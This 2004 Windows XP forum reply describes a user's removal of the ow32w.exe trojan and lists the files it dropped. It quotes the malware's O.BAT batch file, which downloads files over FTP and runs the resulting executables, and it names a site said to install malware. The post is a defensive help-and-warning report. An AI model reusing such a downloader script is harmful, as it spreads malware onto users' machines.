re: belgiandip.com: Mutated / Migrated? ow32w.exe Wednesday, April 21, 2004 at 5:34 pm Windows XP Annoyances Discussion Forum Posted by u660699 (1 messages posted) Hi, whilst I never went near belgiandip.com .... I did manage to pick up something which sounds very similar to the problems described in other posts here ... details plus how I fixed follows .... ow32w.exe Trojan from Totempole found on my XP machine - now removed (I hope). Symptoms: Explore Notepad hijacked . Right clicking to open causes pop ups Missed by SpyBot, Adaware, Trendmicro Antivirus :-( Brownie points to Hotmail for spotting a virus when I had all the offending files zipped up! Internet access attempts stopped by Zonealarm. Thanks to Spybot "Tools-System start up" for spotting ow32w.exe and B6Jhpjm.exe ow32w was running as a process. Killed it (plus any spawned processses) using Process Explorer from www.sysinternals.com No registry changes required that I could spot - unless ofcourse you know better.... Removing the following files fixed it. \Local Settings\Temp ====================================================================== B6Jhpjm.exe 228 KB 16/04/2004 11:31:44 AM a Total 1 file(s); Size: 233667 Byte(s) \Program Files ================================================================ over.exe 3 KB 20/04/2004 11:22:34 PM a pup.exe 245 KB 20/04/2004 11:22:34 PM a Total 2 file(s); Size: 254901 Byte(s) \Windows ========================================================== bdl94126.exe 58 KB 01/03/2004 04:02:00 PM a pup.exe 64 KB 26/02/2004 04:17:50 PM a update12.js 1 KB 01/03/2004 11:50:40 PM a Total 3 file(s); Size: 126314 Byte(s) \Windows\prefetch =================================================================== B6JHPJM.EXE-16AE5CE1.pf 21 KB 16/04/2004 11:31:54 AM a BDL94126.EXE-195022B7.pf 24 KB 20/04/2004 11:23:00 PM a OW32W.EXE-26648B26.pf 12 KB 20/04/2004 11:22:56 PM a PUP.EXE-0402600B.pf 15 KB 20/04/2004 11:22:44 PM a PUP.EXE-052747AD.pf 17 KB 20/04/2004 11:22:44 PM a PUP.EXE-3934063A.pf 15 KB 20/04/2004 11:22:46 PM a Total 6 file(s); Size: 110244 Byte(s) \Windows\system32 =================================================================== O 1 KB 16/04/2004 11:32:16 AM a O.BAT 1 KB 16/04/2004 11:32:16 AM a ow32w.exe 64 KB 26/02/2004 04:17:50 PM a Total 3 file(s); Size: 65880 Byte(s) O.BAT contains the following: ========================================================== if not exist C:\WINDOWSstatuslog ftp -s:o if exist bs5-nt15v.exe bs5-nt15v.exe if exist 0021-bdl94126.EXE 0021-bdl94126.EXE if exist silent.exe silent.exe if exist CS4P028.exe CS4P028.exe ========================================================== I didn't find cs4p028.exe or silent.exe on my machine but a couple of postings suggest others have. Other postings suggest that other files are also created. I deleted a " Thinstaller client " that may also be associated with this zonealarm also shows a file u070104.exe (unclear on timings but looks dodgy!) ow32w.exe Properties Version Company information suggests that " Totempole " are the "people" concerned. WARNING The Javascript file contains the url of a web site WARNING >>> searchcentral.cc <<< DANGEROUS TROJAN SITE PLEASE RESIST the temptation to browse the site. I went in with IE6.0 (yes I know it is stupid and I have now installed the latest SP) with the Security Settings on High and got several pop-ups plus at least 2 executables (over.exe and pup.exe) installed....I'm not going back Worrying aspect from my viewpoint is that: a) I remain unclear how I picked this up b) lost some faith in spybot and adaware c) not convinced I have found everything Any suggestions/thoughts welcomed. Hopefully info provided is sufficent to help others / encourage some updates. On Wednesday, December 17, 2003 at 4:01 pm, BT wrote: >Im getting a popup from Belgiandip.com that launches intermittently when Explorer >is started or shut down. Cant seem to control it through my firewall or popup stopper. >Does anyone know how to kill it? Written in response to: belgiandip.com (BT: Wednesday, December 17, 2003 at 4:01 pm) Responses to this message: re: belgiandip.com: Mutated / Migrated? ow32w.exe (ccam: Saturday, November 13, 2004 at 8:42 pm) All messages in this thread [show all] belgiandip.com (BT: Wed, Dec 17, 2003, 4:01 pm) re: belgiandip.com (MBUSA: Wed, Dec 17, 2003, 4:17 pm) re: belgiandip.com (MBUSA: Wed, Dec 17, 2003, 4:18 pm) re: belgiandip.com (BT: Wed, Dec 17, 2003, 8:18 pm) re: belgiandip.com (werner: Thu, Dec 18, 2003, 2:52 pm) re: McAfee Popups on desktop when booting (Hazel B. Senn: Wed, Mar 30, 2005, 11:28 am) re: McAfee Popups on desktop when booting (Falcon: Wed, Mar 30, 2005, 12:09 pm) re: belgiandip.com (BT: Fri, Dec 19, 2003, 3:27 pm) re: belgiandip.com (THANKYOU!!!: Sun, Mar 21, 2004, 8:38 pm) re: belgiandip.com (L Esl: Wed, Dec 17, 2003, 4:25 pm) re: belgiandip.com (werner: Wed, Dec 17, 2003, 4:30 pm) re: belgiandip.com (werner: Thu, Dec 18, 2003, 12:24 pm) re: belgiandip.com (Jazz: Thu, Dec 18, 2003, 9:52 am) re: belgiandip.com (S: Fri, Apr 9, 2004, 8:10 pm) re: belgiandip.com (Johannes Drescher: Sun, Feb 8, 2004, 7:26 am) re: belgiandip.com (Sleepy: Mon, Mar 29, 2004, 6:42 pm) update on files to delete (mero: Mon, May 24, 2004, 11:57 am) re: belgiandip.com (Cyber Spyder: Mon, Mar 1, 2004, 12:23 am) re: belgiandip.com (Mike: Wed, Mar 3, 2004, 11:06 am) re: belgiandip.com (dubyadee: Fri, Mar 5, 2004, 5:42 pm) re: belgiandip.com (Cyber Spyder: Fri, Mar 5, 2004, 8:55 pm) re: belgiandip.com (Korben: Fri, Apr 9, 2004, 7:41 am) re: belgiandip.com (ruben lima: Wed, Apr 21, 2004, 1:06 pm) re: belgiandip.com - Yet another person who needs help... (Bri: Sun, May 2, 2004, 11:44 am) re: belgiandip.com - New Name (Shaunabobauna: Mon, Apr 12, 2004, 9:43 pm) re: belgiandip.com - New Name (Dennis: Fri, Apr 16, 2004, 11:44 am) re: belgiandip.com (Quoc Nguyen: Fri, Mar 5, 2004, 8:57 pm) re: belgiandip.com (ray: Sat, Mar 6, 2004, 9:12 pm) re: belgiandip.com (Cyber Spyder: Sat, Mar 6, 2004, 11:28 pm) re: belgiandip.com (ray: Sun, Mar 7, 2004, 2:42 pm) re: belgiandip.com (Cyber Spyder: Mon, Mar 8, 2004, 1:30 am) re: belgiandip.com (Erika: Mon, Mar 8, 2004, 9:09 am) re: belgiandip.com (Cyber Spyder: Mon, Mar 8, 2004, 7:18 pm) re: belgiandip.com (Erika: Mon, Mar 8, 2004, 7:45 pm) re: belgiandip.com (ray: Mon, Mar 8, 2004, 7:57 pm) re: belgiandip.com (Cyber Spyder: Mon, Mar 8, 2004, 11:17 pm) re: belgiandip.com (Nancy: Tue, Mar 9, 2004, 4:34 am) re: belgiandip.com (Iain Reid: Tue, Apr 13, 2004, 4:24 am) re: belgiandip.com (Ray: Tue, Apr 13, 2004, 12:37 pm) re: belgiandip.com (Ray: Tue, Apr 13, 2004, 2:14 pm) re: belgiandip.com (Mike: Wed, Apr 14, 2004, 1:08 am) re: belgiandip.com (Erika: Sun, Mar 7, 2004, 2:46 pm) re: belgiandip.com (Mike: Mon, Mar 8, 2004, 9:24 am) re: belgiandip.com (will: Sun, Apr 11, 2004, 6:28 pm) re: belgiandip.com (will: Sun, Apr 11, 2004, 6:36 pm) re: belgiandip.com (kuLLy: Thu, Apr 15, 2004, 12:58 pm) re: belgiandip.com fixed (chaff_salvo: Wed, Mar 10, 2004, 6:06 pm) re: belgiandip.com EASY SOLUTION (Anonymous: Tue, Mar 9, 2004, 9:46 pm) re: belgiandip.com EASY SOLUTION (Jerry: Sat, Apr 17, 2004, 10:58 am) re: belgiandip.com EASY SOLUTION (skippy: Sun, Apr 18, 2004, 12:18 am) re: belgiandip.com EASY SOLUTION (Fluff: Sun, Apr 18, 2004, 8:51 am) re: belgiandip.com residual problem (Mike Lowry: Sun, May 30, 2004, 3:35 pm) re: belgiandip.com residual problem (CrazyTalk: Wed, Jun 2, 2004, 4:04 pm) re: belgiandip.com residual problem (Mandy: Tue, Jul 13, 2004, 6:51 am) re: belgiandip.com residual problem (Charles: Wed, Sep 8, 2004, 10:45 pm) re: belgiandip.com EASY SOLUTION (Muzlhed: Fri, Jun 25, 2004, 2:04 pm) re: belgiandip.com EASY SOLUTION (Diane: Tue, May 4, 2004, 12:45 pm) re: belgiandip.com EASY SOLUTION (joel: Sun, May 9, 2004, 10:10 am) re: belgiandip.com EASY SOLUTION (Mike Duffy: Sun, May 9, 2004, 8:43 am) re: belgiandip.com EASY SOLUTION (Pat: Sun, May 9, 2004, 4:28 pm) re: belgiandip.com EASY SOLUTION:pat (Nathan Griffin: Sun, May 9, 2004, 10:59 pm) re: belgiandip.com EASY SOLUTION:pat (Pat: Mon, May 10, 2004, 7:25 am) re: belgiandip.com EASY SOLUTION:pat (Sara: Tue, May 11, 2004, 7:18 pm) re: belgiandip.com EASY SOLUTION:pat (John Naughton: Fri, May 14, 2004, 8:53 pm) re: belgiandip.com EASY SOLUTION (Faulco: Mon, May 10, 2004, 12:15 am) i found a way to rid of it (jason: Tue, May 11, 2004, 5:10 pm) More Information (Harry May: Fri, Jul 2, 2004, 7:56 am) belgiandip.com :S! (Fernando: Sun, May 16, 2004, 3:08 pm) re: belgiandip.com :S! (Lindsay: Tue, May 18, 2004, 6:54 am) re: belgiandip.com EASY SOLUTION (archie: Sun, May 23, 2004, 11:12 pm) re: belgiandip.com EASY SOLUTION (VICTOR: Mon, May 24, 2004, 3:36 pm) re: belgiandip.com EASY SOLUTION (Jess: Sat, Jun 12, 2004, 5:10 pm) re: belgiandip.com (VelociRapture: Wed, Mar 10, 2004, 8:29 am) re: belgiandip.com (MrDroid: Mon, Mar 22, 2004, 5:07 pm) re: belgiandip.com (iCQ: Mon, Mar 29, 2004, 5:50 pm) re: belgiandip.com (Charles: Sat, Apr 10, 2004, 8:43 pm) re: belgiandip.com (Trippy: Tue, Apr 6, 2004, 2:05 am) re: belgiandip.com (Phoenix: Sat, Apr 10, 2004, 3:40 am) re: belgiandip.com (Mathew : Mon, Apr 12, 2004, 11:40 pm) re: belgiandip.com (attorney bo schimers: Mon, Mar 8, 2004, 3:46 pm) re: belgiandip.com (Nancy: Tue, Mar 9, 2004, 4:21 am) re: belgiandip.com (andrea mauer: Sun, Mar 14, 2004, 6:47 pm) re: belgiandip.com (Vinny: Mon, Mar 15, 2004, 8:15 am) re: belgiandip.com (Tim: Mon, Mar 15, 2004, 11:17 am) re: belgiandip.com (Vinny: Mon, Mar 15, 2004, 12:38 pm) re: belgiandip.com (Tim: Mon, Mar 15, 2004, 1:04 pm) re: belgiandip.com (Vinny: Mon, Mar 15, 2004, 1:44 pm) re: belgiandip.com (Jay: Sun, Mar 21, 2004, 3:00 pm) re: belgiandip.com (Kristiana: Fri, Apr 9, 2004, 11:32 am) re: belgiandip.com (Jim: Fri, Apr 2, 2004, 9:24 pm) re: belgiandip.com (David: Sat, Apr 10, 2004, 8:59 am) re: belgiandip.com (PossumJenkins: Sat, Apr 10, 2004, 12:11 pm) re: belgiandip.com (Derek: Sun, Apr 11, 2004, 8:11 pm) re: belgiandip.com (e: Sun, Apr 11, 2004, 9:46 pm) re: belgiandip.com (Francis: Sat, Apr 10, 2004, 1:26 pm) re: belgiandip.com THIS WILL WORK!!! (eric: Sat, Apr 10, 2004, 6:37 pm) re: belgiandip.com THIS WILL WORK!!! (stephen nesbitt: Thu, Apr 15, 2004, 1:01 pm) re: belgiandip.com (monica: Sun, Apr 11, 2004, 2:01 am) re: belgiandip.com (D Ho: Sun, Apr 11, 2004, 8:13 pm) re: belgiandip.com (Thomas: Mon, Apr 12, 2004, 3:47 pm) re: belgiandip.com (ju: Wed, Apr 14, 2004, 5:09 am) re: belgiandip.com (callix: Wed, Apr 14, 2004, 5:43 am) re: belgiandip.com (ju: Wed, Apr 14, 2004, 6:25 am) re: belgiandip.com (Terence: Fri, Apr 16, 2004, 8:36 am) re: belgiandip.com (Acrobaze: Fri, Apr 16, 2004, 2:41 pm) re: belgiandip.com NEW INFO (Anonymous: Fri, Apr 16, 2004, 6:18 pm) re: belgiandip.com NEW INFO (Jenni: Thu, Apr 22, 2004, 12:49 pm) re: belgiandip.com NEW INFO (Mark: Fri, Apr 30, 2004, 6:10 pm) re: belgiandip.com NEW INFO (CLR: Fri, Apr 30, 2004, 11:12 pm) belgiandip.com - programs by totempole (Jay: Sat, May 1, 2004, 4:00 pm) re: belgiandip.com - programs by totempole (John Naughton: Sat, May 1, 2004, 8:36 pm) re: belgiandip.com - programs by totempole (Akashan: Mon, Jun 21, 2004, 8:41 pm) re: belgiandip.com A SIMPLE SOLUTION!!! (Jack: Sat, Apr 17, 2004, 7:40 am) re: belgiandip.com A SIMPLE SOLUTION!!! (Konrad Adenauer: Sun, Apr 18, 2004, 2:19 pm) re: belgiandip.com A SIMPLE SOLUTION!!! (John Naughton: Wed, Apr 21, 2004, 5:47 pm) re: belgiandip.com A SIMPLE SOLUTION!!! (olivier: Sat, Jul 3, 2004, 5:23 am) re: belgiandip.com A SIMPLE SOLUTION!!! (Rob Leslie: Mon, Apr 26, 2004, 8:29 am) re: belgiandip.com A SIMPLE SOLUTION!!! (Stuart: Thu, Jul 1, 2004, 9:11 am) re: belgiandip.com A SIMPLE SOLUTION!!! (David Barbee: Wed, Sep 22, 2004, 9:51 am) re: belgiandip.com: Mutated / Migrated? ow32w.exe (u660699: Wed, Apr 21, 2004, 5:34 pm) re: belgiandip.com: Mutated / Migrated? ow32w.exe (ccam: Sat, Nov 13, 2004, 8:42 pm) Reply or follow-up to this message Search this forum Start a new thread on a different subject Report abuse of the forum Return to the Windows XP Discussion Forum